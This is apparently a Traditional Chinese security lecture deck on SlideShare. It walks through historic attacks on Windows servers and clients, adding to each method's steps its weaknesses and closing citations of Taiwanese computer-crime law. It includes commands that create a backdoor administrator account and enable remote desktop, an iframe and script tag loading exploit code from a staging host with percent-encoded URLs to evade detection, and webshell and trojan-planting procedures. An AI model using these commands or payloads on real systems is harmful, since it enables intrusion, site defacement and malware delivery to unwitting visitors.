SlideShare ist ein Scribd-Unternehmen logo
1 von 50
Downloaden Sie, um offline zu lesen
黑站騎士
愛在攻擊發起時

      弱點掃描
愛在攻擊發起時
• 弱點掃描工具
•  Switch密碼
•  置換網頁
入侵環境條件:
Server端:
具有「CGI」漏洞的IIS (Web Server)
具有「XP_cmdshell」的SQL Server
沒有更改IIS預設路徑或太好猜
網頁是屬於「.htm & .html」
網站資料夾權限是「Everyone 完全控制」

Client:
具有「MS06-014」 MDAC 漏洞的電腦      或
具有「MS04-023」chm 漏洞的電腦
手法探討:
下載「.htm & .html」網頁
製造遠端遙控型木馬(原生型木馬)
製造「MS06-014、 MS04-023 」漏洞的網頁木馬
先掃描取得具有CGI漏洞的IIS (Web Server)
利用具有XP_cmdshell的SQL Server漏洞上傳網頁
具有漏洞的使用者瀏覽後植入多重木馬




缺點:
Server端及Client端均須利用很多漏洞,不會這麼剛好
恨在床邊不是我

      Metasploit
     Framework
恨在床邊不是我
• MS08-067掃描工具
• Metasploit Framework
•  啟動遠端桌面
入侵環境條件:
具有「MS08-067」的電腦。在受影響的系統上收
到蓄意製作的 RPC 要求,則該弱點可能會允許遠
端執行程式碼。

http://www.microsoft.com/taiwan/technet/s
ecurity/bulletin/ms08-067.mspx

常見於具有「本機使用者帳號的電腦」
Windows 平台均有內建終端機服務(遠端桌面)
操作遠端桌面時被害人不易有感覺。
手法探討:
先掃描取得具有漏洞的電腦
使用MS08-067(MS06-040)漏洞工具
使用DOS語法加入帳號與群組取得權限

net user hacker 1234 /add
net localgroup administrators hacker /add

啟動終端機服務(遠端桌面)

regedit /s 3389.reg
Net start “Terminal Services”

使用遠端桌面遙控


缺點:
不能跨越 Router & VLAN
僅適合於區網及無線網路環境
重點提示:
微軟MS08-067漏洞讓Windows面臨著四年來最大安
全威脅。

首先,該漏洞的影響範圍非常廣泛,幾乎所有的
Windows(2000~XP~2003~vista~2008)都面臨被
攻擊的威脅;

其次,駭客一旦發起攻擊,不但可以遠端控制用戶
電腦,展開一系列的竊取行為。

更嚴重的是該漏洞可能導致「蠕蟲」攻擊,導致使用
者程序崩潰,甚至系統崩潰。
所以明明只是打針

     卻”注入”進去
所以明明只是打針
• SQL 隱碼語法
• 注入工具
•   DB掛馬
入侵環境條件:
Server端:
網頁是屬於「.asp & .aspx & .php」
網頁程式具有「 SQL Injection 」
網頁應用程式呼叫DB權限太大
DB的資料表沒有鎖定權限
具有「XP_cmdshell」的SQL Server
沒有更改IIS預設路徑或太好猜
網站資料夾權限是「Everyone 完全控制」



Client:
具有「MS06-014」MDAC 漏洞的電腦       或
具有「MS07-017」ani 漏洞的電腦
手法探討:
搜尋及尋找具有「 SQL Injection 」
製造遠端遙控型木馬(原生型木馬)
製造「MS06-014、 MS07-017 」漏洞的網頁木馬
利用「 SQL 語法 」新增<iFrame>馬
利用具有IIS 與 SQL Server漏洞上傳ASP網馬
利用ASP網馬褂<iFrame>馬


缺點:
Server端及Client端均須利用很多漏洞,不會這麼剛好
修正「 SQL Injection 」之後就沒效了。
然後生出一堆馬

    抓包、上傳、掛馬
然後生出一堆馬
• 封包擷取工具
• 論壇上傳程式
•  ASP網頁木馬

• 掛馬語法
•  跳板網站上的木馬
模擬案例:JS與論壇掛馬                 入侵過程

入侵前準備:
製作 MS04-023、MS06-014、MS07-004 的 Exploits
程式來呼叫木馬。

於 JavaScript 中撰寫 document.write(“<iframe src=
存放 Exploits 的網址 width=0 height=0></iframe>”);
並存檔為 123.js 來呼叫Exploits 。

將 123.js 檔案 進行 變型及加密 來避免被防毒軟體查殺。

最後將MS04-023、MS06-014、MS07-004 的 Exploits
程式及製作好的 123 .js 檔案放置於 192.168.123.101
之跳板網站內 Muma 的目錄中備用。
模擬案例:JS與論壇掛馬               入侵過程

入侵中過程:
利用 Sniffer 技巧於Dvbbs 論壇中截獲輸入於該論壇的
Cookie 。

利用該 Cookie 內儲存之帳號與密碼所取得之權限,搭配論
壇上傳程式,將 WebShell (windows.asp)上傳至該台
Web Server的論壇目錄中。

於 www.xyz.com.tw/dvbbs/windows.asp 中確認
WebShell (windows.asp)已經成功傳入。

目的是利用 存放於Dvbbs 論壇中的 WebShell 來將XYZ
公司的網站掛馬。
模擬案例:JS與論壇掛馬                      入侵過程

入侵中過程:
撰寫掛馬語法 <script language=javascript
src='http://192.168.123.101/muma/123.js'></script>

為避免存放 123.js 的跳板網站URL網址被阻擋,將該網址進行
URL編碼 來逃避偵測。 <script language=javascript
src='http://%31%39%32%2E%31%36%38%2E%31%
32%33%2E%31%30%31%2F%6D%75%6D%61/123.js
' > </script>

利用 WebShell (windows.asp)將語法掛馬後,查看 XYZ公司
網頁HTML原始碼是否有被異動。
模擬案例:JS與論壇掛馬     入侵過程

入侵後感染:
當使用者瀏覽 XYZ公司 的網站後,變會觸發HTML
內的掛馬語法

感染流程:
URL編碼的掛馬語法     轉換
跳板網站中的123.js    解析
JS內變型及加密的Exploits 程式網址   還
原
Exploits 程式網址內的木馬程式   植入
WebShell 流程
 駭客                知名的官
                   方網站



                               [入侵後上傳]
                               Webshell (網頁
                               木馬)


              首頁           [掛馬] 將首頁或其他
不知情的一                      網頁植入<iFrme>隱
般使用者                       藏框架引導到跳版網
                           站




                   跳版網站   木馬      掛馬的網頁
(Demo)手法探討:
製造相關的木馬並放置在跳板網址主機上。
製造觸發「 MS04-023、MS06-014、MS07-004 」漏洞
的語法。
尋找具有 SQL Server漏洞或程式瑕疵上傳ASP網馬(Web
Shell)。
利用Web Shell 將所屬網站褂上<iFrame>等之惡意連結。

缺點:
Server端及Client端均須利用很多漏洞,如果不是管理者太
粗心,不會這麼剛好都中獎。
修正相關利用到的漏洞之後該手法就沒效了。
只是路過打醬油的

      社交工程
只是路過打醬油的
•   利用弱點植入木馬(RAR、Word)
•    影片加工(RM、暴風影音II)
•    郵件社交工程(MS06001)
入侵環境條件:
具有「RealPlay」 漏洞的電腦      或
喜歡從P2P抓.rm & .rmvb & .wmv影片的使用者
手法探討:
製造遠端遙控型木馬(原生型木馬)
製造「RealPlay」漏洞的網頁木馬
利用綑綁器合併
想辦法送到使用者身上


缺點:
需要有安裝「RealPlay」的電腦
需要喜歡看.rm & .rmvb & .wmv影片的使用者
入侵環境條件:
具有「MS06-001」wmf 漏洞的電腦
使用Windows XP預設的圖片瀏覽程式「Windows
圖片和傳真檢視器」
使用IE5 / IE6瀏覽器
手法探討:
製造遠端遙控型木馬(原生型木馬)
製造MS06-001漏洞工具
利用網頁同時呼叫圖片與wmf檔案
被害人網頁瀏覽或郵件點選超連結後植入
反向連結木馬可穿越防火牆傳出資料


缺點:
目標換了圖片瀏覽工具就沒效了
入侵環境條件:
具有「MS06-001」wmf 漏洞的電腦


安裝「WINRAR」壓縮/解壓縮軟體
手法探討:
製造「彩虹橋」遠端遙控型木馬          (777.exe)
製造MS06-001漏洞工具 (777.jpg 777.wmf)
撰寫呼叫wmf檔案的掛馬網址

          http://192.168.123.101/777/777.htm width=0
<iframe src=
height=0></iframe>


使用WINRAR製做具有XSS的自動解壓縮檔案
被害人點選自動解壓縮檔案後植入
反向連結「彩虹橋」木馬可穿越防火牆傳出資料(例如:
port:8080)

缺點:
目標換了WINRAR壓縮/解壓縮工具就沒效了
修補了MS06-001漏洞就不會被觸發。(但攻擊者可換成其
它漏洞)
社交工程攻擊模式


                   Internet


   1. 駭客設計攻擊陷
      阱程式(如
      阱程式 如特殊       4. 受害者開啟電子
                       受害者開啟電子
                          開啟     6. 後門程式逆向連
                                    後門程式逆向連
           檔案或外部
      Word 檔案或外部       郵件           接,向遠端駭客
      惡意連結)
      惡意連結                          報到
      將攻擊程式置入
   2. 將攻擊程式置入       5. 啟動駭客設計的
      電子郵件中            陷阱,將被植入
                       陷阱,將被植入
                       後門程式
   3. 寄發電子郵件給
      特定的目標


       交通部管理資訊中心         36
預覽視窗開啟 或 點選郵件開啟
          Mail Server

 社交工程
 郵件
攻擊手




                        預覽或點選

                         <iFrame>




計數用Web
Server
點選郵件開啟後再點選郵件內 超連結
          Mail Server

 社交工程
 郵件
攻擊手




                        點選超連結

                         http://xxx




計數用Web
Server
點選郵件開啟後再點選郵件內 附件檔
          Mail Server

 社交工程
 郵件
攻擊手




                        點選附件檔




計數用Web
Server
這一切都是

    ”雲端”害的
何謂雲端運算




雲端的基本概念,是透過網路將龐大的運算處理程式自動分
拆成無數個較小的子程式,再由多部伺服器所組成的龐大系
統搜尋、運算分析之後將處理結果回傳給使用 者。

透過這項技術,遠端的服務供應商可以在數秒之內,達成處
理數以千萬計甚至億計的資訊,達到和「超級電腦」同樣強
大效能的網路服務。
3.攻擊使用者與雲端
之間的連線。(例:          1.攻擊雲端本身。(例:DDoS,攻
DDoS,中間人攻擊)        擊設備,退信攻擊,Web攻擊)



                                 2.攻擊雲
                                 端週邊。
                                 (例:
                                 DNS欺騙,
                                 憑證偽冒,
                                 中間人攻
                                 擊)




          4.攻擊雲端使用者。(例:社交工程,竊取帳號/密碼)
雲端攻擊入侵:
1.   攻擊雲端本身。(例:DDoS,攻擊設備,退信攻擊,Web
     攻擊)

2.   攻擊雲端週邊。(例:DNS欺騙,憑證偽冒,中間人攻擊)

3.   攻擊使用者與雲端之間的連線。(例:DDoS,中間人
     攻擊)

4.   攻擊雲端使用者。(例:社交工程,竊取帳號/密碼)

5.   建立駭客雲利用合法管道攻擊(例:以合法掩護非法)
GMail Commander
 GMail Commander 是一種檢查信件的軟體,它
 允許於檢查信件的同時,接受來自於Gmail信箱所
 發送的各種控制指令,來進行遠端遙控。

 註:遠端遙控部分需自行於Gmail中撰寫批次檔,
 或者呼叫系統的捷徑列。
GMail Commander
 問題點:
 發送純文字檔的信,而目標電腦並沒有把信接收下
 去的狀態下去控制及觸發對方電腦起床工作了。




 參考資料 (原始碼):
 http://www.autohotkey.com/forum/topic67120.html
單機電腦:挖出電腦密碼
軟體名稱: Windows Password Recovery Tools 工
具組(包含:如下表格)

下載網頁:請利用搜尋引擎搜尋

軟體說明:原理:從系統的暫存檔、登錄檔、cookies、
應用程式的安裝檔、設定檔內將儲存的密碼檔案”顯示”
出來,並非使用暴力破解所計算出來。

註:部分防毒軟體可能會認為這類軟體為木馬或惡意程
式,如果有疑慮請勿使用 。

參考網址: http://briian.com/?p=6910
軟體名稱                        主要功能:顯示以下軟體的密碼
MessenPass                  顯示MSN /Windows Live Messenger, Yahoo
                            Messenger, ICQ , AOL , Trillian, Miranda, GAIM
Mail PassView               顯示Windows Live Mail, Outlook Express, Microsoft
                            Outlook 2000/2002/2003/2007, Eudora, Mozilla
                            Thunderbird, HotMail, Yahoo!, Gmail
IE PassView                 顯示 IE 4, IE5, IE6, IE7, IE8 所暫存的密碼
Dialupass                   Windows 2000, XP, Vista, 2003, 2008, 7的撥號軟體
Network Password Recovery   Windows 2000, XP, Vista, 2003, 2008, 7的網芳密碼

SniffPass                   側錄 Web/FTP/Email 的密碼
WebBrowserPassView          顯示Internet Explorer (Version 4.0 ~ 8.0), Mozilla
                            Firefox (All Versions), Google Chrome, Opera 密碼

WirelessKeyView             顯示 WEP/WPA 所儲存在電腦的密碼
Remote Desktop PassView     顯示 遠端桌面軟體 所暫存在電腦的密碼

VNCPassView                 顯示 VNC遙控軟體 所儲存在
                            Registry(HKEY_CURRENT_USER) 的密碼
結論
法律宣導
刑法第4條規定:犯罪之行為或結果,有一在中華民國領域內者,為在中華民國領域內犯罪。

刑法第153條規定:以文字、圖畫或他法,煽惑他人犯罪者,處二年以下徒刑、拘役或一千元
以下罰金。

刑法第339-3條:意圖為自己或第三人不法之所有,以不正方法將虛偽資料或不正指令輸入電
腦或其相關設備,製作財產權之得喪、變更紀錄,而取得他人財產,得處以七年以下有期徒刑。

刑法第358條規定:無故輸入他人帳號密碼、破解使用電腦之保護措施或利用電腦系統之漏洞,
而入侵他人之電腦或其相關設備者,處三年以下有期徒刑、拘役或科或併科十萬元以下罰金。

刑法第359條:無故取得、刪除或變更他人電腦或其相關設備之電磁紀錄,致生損害於公眾或
他人者,處五年以下有期徒刑、拘役或科或併科二十萬元以下罰金。

刑法第360條規定:無故以電腦程式或其他電磁方式干擾他人電腦或其相關設備,致生損害於
公眾或他人者,處三年以下有期徒刑、拘役或科或併科十萬元以下罰金。

刑法第362條規定:製作專供犯罪(例如利用病毒程式干擾電腦)之程式,而供自己或他人使
用,致生損害於公眾或他人時,處五年以下有期徒刑、或科二十萬元以下罰金。

電腦處理個人資料保護法第34條:意圖為自己或第三人不法之利益或損害他人之利益,而對於
個人資料檔案為非法輸出、干擾、變更、刪除或以其他非法方法妨害個人資料檔案之正確,致生
損害於他人者,處三年以下有期徒刑、拘役或科新台幣五萬元以下罰金。
講師: 呂守箴
E-Mail:shooujen@gmail.com

部落格:
網路攻防戰:http://anti-hacker.blogspot.com

Plurk噗浪: http://www.plurk.com/openblue
FaceBook: http://www.facebook.com/openblue
粉絲團:http://www.facebook.com/NetWarGame

網路直播頻道:http://zh-tw.justin.tv/openblueTV

Weitere ähnliche Inhalte

Was ist angesagt?

安博士Asec 2010年8月安全报告
安博士Asec 2010年8月安全报告安博士Asec 2010年8月安全报告
安博士Asec 2010年8月安全报告ahnlabchina
 
台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤jack51706
 
[xKungFoo2012]Web Service Hack
[xKungFoo2012]Web Service Hack[xKungFoo2012]Web Service Hack
[xKungFoo2012]Web Service Hackpnig0s pnig0s
 
一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教Bruce Chen
 
Web安全分享 -公开版
Web安全分享 -公开版Web安全分享 -公开版
Web安全分享 -公开版piao2010
 
Tdohconf 2017-ncku
Tdohconf 2017-nckuTdohconf 2017-ncku
Tdohconf 2017-nckujack51706
 
第一次使用Shodan.io就上手
第一次使用Shodan.io就上手第一次使用Shodan.io就上手
第一次使用Shodan.io就上手Ting-En Lin
 
11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢
11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢
11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢T客邦
 
2017.11.22 OWASP Taiwan Week (Lucas Ko)
2017.11.22  OWASP Taiwan Week (Lucas Ko)2017.11.22  OWASP Taiwan Week (Lucas Ko)
2017.11.22 OWASP Taiwan Week (Lucas Ko)Lucas Ko
 
Malware Analysis - Basic and Concept
Malware Analysis - Basic and ConceptMalware Analysis - Basic and Concept
Malware Analysis - Basic and ConceptJulia Yu-Chin Cheng
 
企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)WASecurity
 
产品介绍
产品介绍产品介绍
产品介绍nogoodren
 
OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版Bruce Chen
 
安博士Asec 2010年6月安全报告
安博士Asec 2010年6月安全报告安博士Asec 2010年6月安全报告
安博士Asec 2010年6月安全报告ahnlabchina
 
SITCON2021 Web Security 領航之路
SITCON2021  Web Security 領航之路SITCON2021  Web Security 領航之路
SITCON2021 Web Security 領航之路Tzu-Ting(Fei) Lin
 
卡巴斯基個人版 7.0導覽
卡巴斯基個人版 7.0導覽  卡巴斯基個人版 7.0導覽
卡巴斯基個人版 7.0導覽 briian
 

Was ist angesagt? (19)

安博士Asec 2010年8月安全报告
安博士Asec 2010年8月安全报告安博士Asec 2010年8月安全报告
安博士Asec 2010年8月安全报告
 
台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤
 
[xKungFoo2012]Web Service Hack
[xKungFoo2012]Web Service Hack[xKungFoo2012]Web Service Hack
[xKungFoo2012]Web Service Hack
 
一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教
 
Web安全分享 -公开版
Web安全分享 -公开版Web安全分享 -公开版
Web安全分享 -公开版
 
Tdohconf 2017-ncku
Tdohconf 2017-nckuTdohconf 2017-ncku
Tdohconf 2017-ncku
 
第一次使用Shodan.io就上手
第一次使用Shodan.io就上手第一次使用Shodan.io就上手
第一次使用Shodan.io就上手
 
08
0808
08
 
11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢
11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢
11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢
 
2017.11.22 OWASP Taiwan Week (Lucas Ko)
2017.11.22  OWASP Taiwan Week (Lucas Ko)2017.11.22  OWASP Taiwan Week (Lucas Ko)
2017.11.22 OWASP Taiwan Week (Lucas Ko)
 
Malware Analysis - Basic and Concept
Malware Analysis - Basic and ConceptMalware Analysis - Basic and Concept
Malware Analysis - Basic and Concept
 
企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)
 
产品介绍
产品介绍产品介绍
产品介绍
 
OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版
 
8 3
8 38 3
8 3
 
安博士Asec 2010年6月安全报告
安博士Asec 2010年6月安全报告安博士Asec 2010年6月安全报告
安博士Asec 2010年6月安全报告
 
SITCON2021 Web Security 領航之路
SITCON2021  Web Security 領航之路SITCON2021  Web Security 領航之路
SITCON2021 Web Security 領航之路
 
Banquet 44
Banquet 44Banquet 44
Banquet 44
 
卡巴斯基個人版 7.0導覽
卡巴斯基個人版 7.0導覽  卡巴斯基個人版 7.0導覽
卡巴斯基個人版 7.0導覽
 

Ähnlich wie 黑站騎士

安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告ahnlabchina
 
Clientside attack using HoneyClient Technology
Clientside attack using HoneyClient TechnologyClientside attack using HoneyClient Technology
Clientside attack using HoneyClient TechnologyJulia Yu-Chin Cheng
 
議題二:Web應用程式安全防護
議題二:Web應用程式安全防護議題二:Web應用程式安全防護
議題二:Web應用程式安全防護Nicolas su
 
安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告ahnlabchina
 
互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈 互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈 zhiyanhui
 
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台Timothy Chen
 
WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」Orange Tsai
 
第四节课:web安全2.0
第四节课:web安全2.0第四节课:web安全2.0
第四节课:web安全2.0Tommy Chang
 
浏览器的跨域安全问题
浏览器的跨域安全问题浏览器的跨域安全问题
浏览器的跨域安全问题raystyle
 
深入研究 Windows 系統服務 效能調校與故障排除
深入研究 Windows 系統服務    效能調校與故障排除深入研究 Windows 系統服務    效能調校與故障排除
深入研究 Windows 系統服務 效能調校與故障排除5045033
 
用戶端攻擊與防禦
用戶端攻擊與防禦用戶端攻擊與防禦
用戶端攻擊與防禦Taien Wang
 
Php应用程序常见安全问题解析
Php应用程序常见安全问题解析Php应用程序常见安全问题解析
Php应用程序常见安全问题解析mysqlops
 
浏览器的跨域安全问题
浏览器的跨域安全问题浏览器的跨域安全问题
浏览器的跨域安全问题guest4ca427
 
Swsoft Prima@Hosting 介绍
Swsoft Prima@Hosting 介绍Swsoft Prima@Hosting 介绍
Swsoft Prima@Hosting 介绍webhostingguy
 
雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題Alan Lee
 
六步教你学会简单Rmi
六步教你学会简单Rmi六步教你学会简单Rmi
六步教你学会简单Rmiyiditushe
 
Построение гиперболического параболоида
Построение гиперболического параболоидаПостроение гиперболического параболоида
Построение гиперболического параболоидаbekkermankn
 
Web应用安全:过去,现在,未来(Public Ver)
Web应用安全:过去,现在,未来(Public Ver)Web应用安全:过去,现在,未来(Public Ver)
Web应用安全:过去,现在,未来(Public Ver)ph4nt0m
 
利用Signalr打造即時通訊@Tech day geek
利用Signalr打造即時通訊@Tech day geek利用Signalr打造即時通訊@Tech day geek
利用Signalr打造即時通訊@Tech day geekJohnson Gau
 
mobile_我要怎麼設定WF2409一個無線基地台給自己用,另一個給訪客用,讓訪客用的網路不會影響內部網路
mobile_我要怎麼設定WF2409一個無線基地台給自己用,另一個給訪客用,讓訪客用的網路不會影響內部網路mobile_我要怎麼設定WF2409一個無線基地台給自己用,另一個給訪客用,讓訪客用的網路不會影響內部網路
mobile_我要怎麼設定WF2409一個無線基地台給自己用,另一個給訪客用,讓訪客用的網路不會影響內部網路臺灣塔米歐
 

Ähnlich wie 黑站騎士 (20)

安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告
 
Clientside attack using HoneyClient Technology
Clientside attack using HoneyClient TechnologyClientside attack using HoneyClient Technology
Clientside attack using HoneyClient Technology
 
議題二:Web應用程式安全防護
議題二:Web應用程式安全防護議題二:Web應用程式安全防護
議題二:Web應用程式安全防護
 
安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告
 
互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈 互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈
 
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
 
WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」
 
第四节课:web安全2.0
第四节课:web安全2.0第四节课:web安全2.0
第四节课:web安全2.0
 
浏览器的跨域安全问题
浏览器的跨域安全问题浏览器的跨域安全问题
浏览器的跨域安全问题
 
深入研究 Windows 系統服務 效能調校與故障排除
深入研究 Windows 系統服務    效能調校與故障排除深入研究 Windows 系統服務    效能調校與故障排除
深入研究 Windows 系統服務 效能調校與故障排除
 
用戶端攻擊與防禦
用戶端攻擊與防禦用戶端攻擊與防禦
用戶端攻擊與防禦
 
Php应用程序常见安全问题解析
Php应用程序常见安全问题解析Php应用程序常见安全问题解析
Php应用程序常见安全问题解析
 
浏览器的跨域安全问题
浏览器的跨域安全问题浏览器的跨域安全问题
浏览器的跨域安全问题
 
Swsoft Prima@Hosting 介绍
Swsoft Prima@Hosting 介绍Swsoft Prima@Hosting 介绍
Swsoft Prima@Hosting 介绍
 
雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題
 
六步教你学会简单Rmi
六步教你学会简单Rmi六步教你学会简单Rmi
六步教你学会简单Rmi
 
Построение гиперболического параболоида
Построение гиперболического параболоидаПостроение гиперболического параболоида
Построение гиперболического параболоида
 
Web应用安全:过去,现在,未来(Public Ver)
Web应用安全:过去,现在,未来(Public Ver)Web应用安全:过去,现在,未来(Public Ver)
Web应用安全:过去,现在,未来(Public Ver)
 
利用Signalr打造即時通訊@Tech day geek
利用Signalr打造即時通訊@Tech day geek利用Signalr打造即時通訊@Tech day geek
利用Signalr打造即時通訊@Tech day geek
 
mobile_我要怎麼設定WF2409一個無線基地台給自己用,另一個給訪客用,讓訪客用的網路不會影響內部網路
mobile_我要怎麼設定WF2409一個無線基地台給自己用,另一個給訪客用,讓訪客用的網路不會影響內部網路mobile_我要怎麼設定WF2409一個無線基地台給自己用,另一個給訪客用,讓訪客用的網路不會影響內部網路
mobile_我要怎麼設定WF2409一個無線基地台給自己用,另一個給訪客用,讓訪客用的網路不會影響內部網路
 

黑站騎士